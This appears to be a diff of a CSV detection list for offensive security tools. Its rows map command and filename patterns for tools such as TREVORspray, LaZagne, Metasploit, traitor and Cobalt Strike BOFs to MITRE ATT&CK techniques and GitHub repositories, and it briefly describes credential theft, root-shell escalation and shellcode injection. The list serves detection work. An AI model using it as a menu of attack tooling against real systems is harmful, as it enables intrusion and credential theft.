- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" -"*traitor -a *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor --any *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor -e *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor --exploit*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor -p *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*tree_connect_andx_request*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*traitor -a *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor --any *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor -e *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor --exploit*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor -p *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*tree_connect_andx_request*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*TrevorC2*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" -"*trevorproxy ssh*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorproxy 
subnet*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorproxy ssh*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorproxy subnet*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*trevorsaudi/Mshikaki*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. 
Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" -"*trevorspray -*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray -*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*trevorspray *--recon *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*trevorspray -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*trevorspray.cli*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password 
sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.enumerators*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.looters*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.py*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.sprayers*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray/existent_users.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules 
and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray/valid_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*TREVORspray-dev*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*TREVORspray-master*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*TREVORspray-trevorspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*tricks01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*trevorspray.cli*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.enumerators*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.looters*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.py*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.sprayers*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/existent_users.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/valid_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-dev*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-master*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-trevorspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*tricks01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*trickster0/Enyx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*tricky.lnk*","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","105","38","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" -"*Trojan.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*truecrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Trojan.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*truecrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*True-Demon*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/True-Demon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*trufflehog git *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*truffleHog*","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","12169","1420","2023-10-03T19:08:27Z","2016-12-31T05:08:12Z" -"*TruffleSnout.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*--trusted-for-delegation --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*truffleHog*","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","12176","1422","2023-10-04T20:56:03Z","2016-12-31T05:08:12Z" +"*TruffleSnout.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*--trusted-for-delegation --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*TrustedPath-UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. 
The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" -"*trustedsec/social-engineer-toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*trustedsec/social-engineer-toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. 
SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" "*trustedsec/unicorn*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*TryCatchHCF*","offensive_tool_keyword","Github Username","github repo hosting sniffing spoofing and data exfiltration tools","N/A","N/A","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ts.php*vi.txt*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - 